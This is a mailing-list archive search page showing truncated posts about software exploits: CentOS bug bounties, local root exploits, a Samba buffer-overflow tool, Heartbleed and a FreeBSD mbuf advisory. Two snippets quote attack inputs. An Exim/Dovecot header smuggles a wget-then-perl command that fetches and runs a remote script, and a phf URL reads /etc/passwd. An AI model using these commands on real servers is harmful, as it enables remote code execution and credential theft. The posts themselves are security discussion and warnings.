search for: exploit

Displaying 20 results from an estimated 2902 matches for "exploit".

2012 Jan 16
2
bounties for exploits against CentOS?
With companies like Facebook and Google offering cash prizes for people who can find security holes in their products, has there ever been any consideration given to offering cash rewards to people finding security exploits in CentOS or in commonly bundled services like Apache? (Provided of course they follow "responsible disclosure" and report the exploit to the software authors and get it fixed.) Obviously the benefit would be that it would increase the chance of a white hat finding and fixing an exp...
2006 Nov 14
2
Exploit
////usr/lib/kde3/kfile_ps.so: Exploit.Linux.Gv FOUND ////usr/lib/kde3/gsthumbnail.so: Exploit.Linux.Gv FOUND ////usr/lib/libgs.so.7.07: Exploit.Linux.Gv FOUND ////usr/lib/libkghostviewlib.so.0.0.0: Exploit.Linux.Gv FOUND I start the procmail process and a mail with those lines appears in my inbox (with subject "Virus found")...
2017 Apr 15
5
OT: systemd Poll - So Long, and Thanks for All the fish.
...source. It is highly unlikely that the NSA, or any other agency, would risk putting in backdoors to code that could be audited by Joe "random hacker" Blogs, let alone that might be discovered by hostile agencies. There is no doubt that most security agencies have a long list of zero-day exploits in their toolbox - I would hazard to suggest that they wouldn't be doing their job if they didn't! But I seriously doubt they would commission exploitable code in something that is openly auditable. P.
2011 Dec 28
8
what percent of time are there unpatched exploits against default config?
...ot subscribed to any security alert mailing lists which send out announcements like "Please disable this feature as a workaround until this hole is plugged", so the machine just hums along with all of its default settings. So the machine can still be broken into, if there is an unpatched exploit released in the wild, in the window of time before a patch is released for that update. On the other hand, at any point in time where there are no unpatched exploits in the wild, the machine should be much harder to break into. Roughly what percent of the time is there such an unpatched exploit i...
2008 Feb 11
5
local root exploit
I saw that there is a local root exploit in the wild. http://blog.kagesenshi.org/2008/02/local-root-exploit-on-wild.html And I see my centos box still has: 2.6.18-53.1.4.el5 yum says there are no updates... am I safe? Valent.
2017 Feb 09
4
Serious attack vector on pkcheck ignored by Red Hat
On Thu, 2017-02-02 at 13:40 -0800, Gordon Messmer wrote: > Escalation *requires* attacking a program in a security context other > than your own. Not necessarily. Suppose the adversary is aware of a root exploit/privilege escalation in a random library. Then the heap spraying allows this attacker to easily trigger this exploit because he is able to initialize the entire contents of the heap to his liking and thus call whatever function he likes, including the one that will cause the root exploit. So even...
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is usi...
2004 Dec 11
2
Security exploit downloaded with FLAC?
As is my routine every couple of weeks, I ran Pest Patrol anti-spyware software, and was disturbed to find it came back saying that the file FLAC/COPYING.FDL was a security exploit known as "Virus Tutorial" or VTool/jul2. This has left me wondering if FLAC is to be trusted. Here's what PestPatrol's web site has to say about it: Exploit: A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it. Exploits a...
2003 Jun 11
2
Kulak exploit
Some time ago one of my customer's computers was compromised by outside attackers, and though we were able to clean it up I never learned how. A few weeks back, my own office machine was hacked and the signs were similar; but this time I found an exploit program named "kulak" in my /tmp directory. Evidently (according to the source, which the attacker left behind also) kulak exploits a buffer overflow in Samba 2.2.8 to get a root shell. I searched Google to no avail for this exploit; so I am asking here. Is this bug fixed in later...
2008 Feb 10
2
Root exploit in the wild
https://bugzilla.redhat.com/show_bug.cgi?id=432251 Mentioned on Slashdot here: http://it.slashdot.org/article.pl?sid=08/02/10/2011257 Fedora bug report here: https://bugzilla.redhat.com/show_bug.cgi?id=432229 -- MELVILLE THEATRE ~ Melville Sask ~ http://www.melvilletheatre.com
2014 Apr 08
2
OpenSSL Heartbeat exploit against KVM guest systems
Is it possible to use this exploit against a kvm guest to read memory used by the host? In other words: if an exploitable service, say httpd with mod_ssl, is running in guest system 'vm1' hosted on system 'virthost' then what implications does that have with respect to guests vm2 and vm3 and to virthost itself? --...
2005 Oct 15
2
GID Games Exploits
It has come to my attention that there are quite a few local exploits circling around in the private sector for GID Games. Several of the games have vanilla stack overflows in them which can lead to elevation of privileges if successfully exploited.
1998 Feb 20
0
"not-so-dangerous symlink bugs" - a better look
...] link bug" is a vulnerability, which allows user X to overwrite files owned by Y (with useless portion of junk) when Y launches buggy program. But this trivial (and often ignored) attack method can be easily turned into a cute, powerful weapon. Here's an example how to perform advanced exploitation of gcc symlink bug (I chose that one, because this problem is probably well-known and it's pretty easy to fix). Original exploit code has been posted here about 1 month ago... ADVANCED "symlink" ATTACK First of all, we need to fix our exploit by replacing symlink with na...
2001 Nov 28
1
Possible root-exploit in openssh?
...trator in one of the student clubs here. We run about 10 computers with one server. Mainly linux and all run openssh. We have closed telnet so only ssh-connections are allowed. Last night I got a mail from one of the system administrators at Göteborgs university saying that there was a possible root exploit in all openssh versions from 2.9.9p2 and below. Shortly after this the university closed all connections using port 22 (that is how serious they think it is) effectively making all the machines I am responsible for unable to log on to from the outside. They have looked at the exploit and I'll tr...
2004 Feb 18
2
is this mbuf problem real?
BM_207650 MEDIUM Vulnerability Version: 1 2/18/2004@03:47:29 GMT Initial report <https://ialert.idefense.com/KODetails.jhtml?irId=207650> ID#207650: FreeBSD Memory Buffer Exhaustion Denial of Service Vulnerability (iDEFENSE Exclusive): Remote exploitation of a denial of service (DoS) vulnerability in FreeBSD's memory buffers (mbufs) could allow attackers to launch a DoS attack. By sending many out-of-sequence packets, a low bandwidth denial of service attack is possible against FreeBSD. When the targeted system runs out of memory buffers (...
1996 Dec 06
0
phf & Bash exploit
...but can still be escaped using 0xFF. It takes vulnerabilities in both phf and bash for it to work. I have tested this very successfully on many linux machines. I would imagine that most people are aware of the 0x0A escape and so when they test it on their own box they think they are safe from phf exploitation. The syntax for the exploit is almost identical to the older phf exploit. To execute commands: (cat /etc/passwd) http://server.net/cgi-bin/phf?Qalias=%ffcat%20/etc/passwd I know this exploit isn't only confined to linux, but it seems it's easiest to exploit on linux. If everybody i...
1998 Jul 14
3
Qpop CERT advisory?
Hello, Anyone have information on whether RedHat-5.0+ is affected by the recent (today's) CERT advisory regarding QPOP? thanks, -bp -- B. James Phillippe <bryan@terran.org> Linux Software Engineer, WGT Inc. http://earth.terran.org/~bryan
2008 Feb 10
3
Bug#464969: xen-hypervisor-3.2-1-i386: Linux mmap()/vmsplice() exploit causes memory map corruption in hypervisor regardless of domain privilege
Package: xen-hypervisor-3.2-1-i386 Version: 3.2-1 Severity: critical Tags: security Justification: DoS of entire system regardless of privilege When running the exploit listed in bug 464953 [1], Xen's memory state becomes corrupted and the hypervisor eventually crashes, taking all of the domU's with it. As such, this breaks operational behaviour, so I have marked this as critical. [1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953 -- System Info...
2017 Apr 10
2
Fwd: Obsolete NSA exploit for Postfix 2.0 - 2.2
This was just posted on the Postfix list. Centos 7 ships with: postfix-2.10.1-6.el7 Has this cert advisory been applied to the Centos build of Postfix? thank you -------- Forwarded Message -------- Subject: Obsolete NSA exploit for Postfix 2.0 - 2.2 Date: Sun, 9 Apr 2017 16:18:06 -0400 (EDT) From: Wietse Venema <wietse at porcupine.org> To: Postfix users <postfix-users at postfix.org> CC: Postfix announce <postfix-announce at postfix.org> A recent twitter post reveals the existence of an exploit f...